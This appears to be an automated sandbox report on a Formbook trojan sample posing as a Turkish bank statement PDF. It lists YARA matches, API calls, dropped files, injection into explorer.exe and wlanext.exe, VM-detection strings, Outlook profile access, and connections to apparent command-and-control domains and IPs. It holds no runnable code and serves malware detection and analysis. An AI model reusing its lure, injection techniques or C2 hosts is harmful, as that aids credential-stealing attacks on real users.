          Source: 2.2.oaqcoreqiw.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 2.2.oaqcoreqiw.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.303606664.0000000000F10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.303606664.0000000000F10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.303417878.0000000000DC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.303417878.0000000000DC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.513151308.0000000002BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.513151308.0000000002BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.512971640.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.512971640.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.513376211.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000009.00000002.513376211.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000002.00000002.303227633.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe Code function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exe Code function: String function: 010A61F0 appears 96 times
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exe Code function: String function: 010A89B8 appears 56 times
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exe Code function: 2_2_0041E5F3 NtCreateFile
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exe Code function: 2_2_0041E6A3 NtReadFile
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exe Code function: 2_2_0041E723 NtClose
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exe Code function: 2_2_0041E7D3 NtAllocateVirtualMemory
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exe Code function: 2_2_0041E5ED NtCreateFile
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exe Code function: 2_2_0041E69D NtReadFile
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exe Code function: 2_2_0041E7CD NtAllocateVirtualMemory
          Source: T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe ReversingLabs: Detection: 35%
          Source: T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe Virustotal: Detection: 39%
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe File read: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe
          Source: T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknown Process created: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe Process created: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exe "C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exe Process created: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exe C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe
          Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exe
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeProcess created: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exe "C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.iJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeProcess created: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exe C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exeJump to behavior
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wlanext.exe C:\Windows\SysWOW64\wlanext.exeJump to behavior
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403640
          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ERC\statecache.lockJump to behavior
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsfD19.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/5@7/5
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_004021AA CoCreateInstance,0_2_004021AA
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404AB5
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCommand line argument: Notepad1_2_010A28A0
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCommand line argument: Notepad2_2_010A28A0
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: wntdll.pdbUGP source: oaqcoreqiw.exe, 00000001.00000003.249486929.000000001AB90000.00000004.00001000.00020000.00000000.sdmp, oaqcoreqiw.exe, 00000001.00000003.248858259.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, oaqcoreqiw.exe, 00000002.00000002.303874749.00000000011EF000.00000040.00001000.00020000.00000000.sdmp, oaqcoreqiw.exe, 00000002.00000002.303874749.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, oaqcoreqiw.exe, 00000002.00000003.257475218.0000000000D20000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000009.00000003.305180491.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000009.00000002.513936426.000000000357F000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000009.00000003.303312759.000000000312C000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000009.00000002.513936426.0000000003460000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: oaqcoreqiw.exe, 00000001.00000003.249486929.000000001AB90000.00000004.00001000.00020000.00000000.sdmp, oaqcoreqiw.exe, 00000001.00000003.248858259.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, oaqcoreqiw.exe, 00000002.00000002.303874749.00000000011EF000.00000040.00001000.00020000.00000000.sdmp, oaqcoreqiw.exe, 00000002.00000002.303874749.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, oaqcoreqiw.exe, 00000002.00000003.257475218.0000000000D20000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000009.00000003.305180491.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000009.00000002.513936426.000000000357F000.00000040.00001000.00020000.00000000.sdmp, wlanext.exe, 00000009.00000003.303312759.000000000312C000.00000004.00000020.00020000.00000000.sdmp, wlanext.exe, 00000009.00000002.513936426.0000000003460000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wlanext.pdb source: oaqcoreqiw.exe, 00000002.00000002.303761308.0000000001000000.00000040.10000000.00040000.00000000.sdmp
          Source: Binary string: wlanext.pdbGCTL source: oaqcoreqiw.exe, 00000002.00000002.303761308.0000000001000000.00000040.10000000.00040000.00000000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 1_2_010A6235 push ecx; ret 1_2_010A6248
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_00407033 push ds; retf 2_2_00407034
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_0041B377 pushad ; iretd 2_2_0041B378
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_0041B379 push eax; iretd 2_2_0041B37A
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_00403444 push ebp; ret 2_2_00403450
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_004055DA push ecx; ret 2_2_004055E1
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_004105E3 push esi; iretd 2_2_004105ED
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_00401DB0 push eax; ret 2_2_00401DB2
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_010A6235 push ecx; ret 2_2_010A6248
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 1_2_010A592A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_010A592A
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeFile created: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeJump to dropped file
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exe TID: 324Thread sleep time: -34000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\wlanext.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 872Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 865Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeAPI coverage: 5.1 %
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeAPI coverage: 2.0 %
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D74
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_0040699E FindFirstFileW,FindClose,0_2_0040699E
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 1_2_010A1042 FindFirstFileW,FindClose,1_2_010A1042
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 1_2_010A1050 FindFirstFileW,FindClose,1_2_010A1050
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_010A1042 FindFirstFileW,FindClose,2_2_010A1042
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_010A1050 FindFirstFileW,FindClose,2_2_010A1050
          Source: C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exeAPI call chain: ExitProcess graph end nodegraph_0-3476
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeAPI call chain: ExitProcess graph end nodegraph_1-12582
          Source: explorer.exe, 00000003.00000000.267370302.0000000005FA1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: en_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}nt@she8
          Source: explorer.exe, 00000003.00000002.523892470.0000000007AFF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.270321034.0000000007B66000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000008
          Source: explorer.exe, 00000003.00000000.270321034.0000000007BB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000002.521718794.0000000005EF4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: wlanext.exe, 00000009.00000002.516322379.00000000075F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000003.00000000.270321034.0000000007BB1000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}E2%d
          Source: explorer.exe, 00000003.00000002.527994435.000000000F5CA000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllate
          Source: wlanext.exe, 00000009.00000002.516322379.00000000075F1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW,
          Source: explorer.exe, 00000003.00000003.462549906.0000000006050000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Y
          Source: explorer.exe, 00000003.00000002.521718794.0000000005F12000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 1_2_010A592A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_010A592A
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 1_2_010A1140 GetWindowTextLengthW,SendMessageW,CreateFileW,GetFileSize,CloseHandle,GetProcessHeap,HeapAlloc,ReadFile,CloseHandle,GetProcessHeap,HeapFree,CloseHandle,MultiByteToWideChar,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,MultiByteToWideChar,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,SetWindowTextW,GetProcessHeap,HeapFree,SendMessageW,SendMessageW,SendMessageW,SetFocus,GetWindowTextW,lstrcmpW,GetWindowTextLengthW,SendMessageW,SendMessageW,SendMessageW,1_2_010A1140
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_0040CF23 LdrLoadDll,2_2_0040CF23
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 1_2_010A814A SetUnhandledExceptionFilter,1_2_010A814A
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 1_2_010A816D SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_010A816D
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_010A814A SetUnhandledExceptionFilter,2_2_010A814A
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeCode function: 2_2_010A816D SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_010A816D

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exeDomain query: www.genuineinsights.cloud
          Source: C:\Windows\explorer.exeDomain query: www.octohoki.net
          Source: C:\Windows\explorer.exeNetwork Connect: 107.148.8.96 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 194.102.227.30 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 184.94.215.91 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 66.96.162.149 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.cutgang.net
          Source: C:\Windows\explorer.exeDomain query: www.energybig.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.215 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.wenzid4.top
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeSection unmapped: C:\Windows\SysWOW64\wlanext.exe base address: 8A0000Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeSection loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeThread register set: target process: 3320Jump to behavior
          Source: C:\Windows\SysWOW64\wlanext.exeThread register set: target process: 3320Jump to behavior
          Source: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exeProcess created: C:\Users\user\AppData\Local\Temp\oaqcoreqiw.exe C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exeJump to behavior
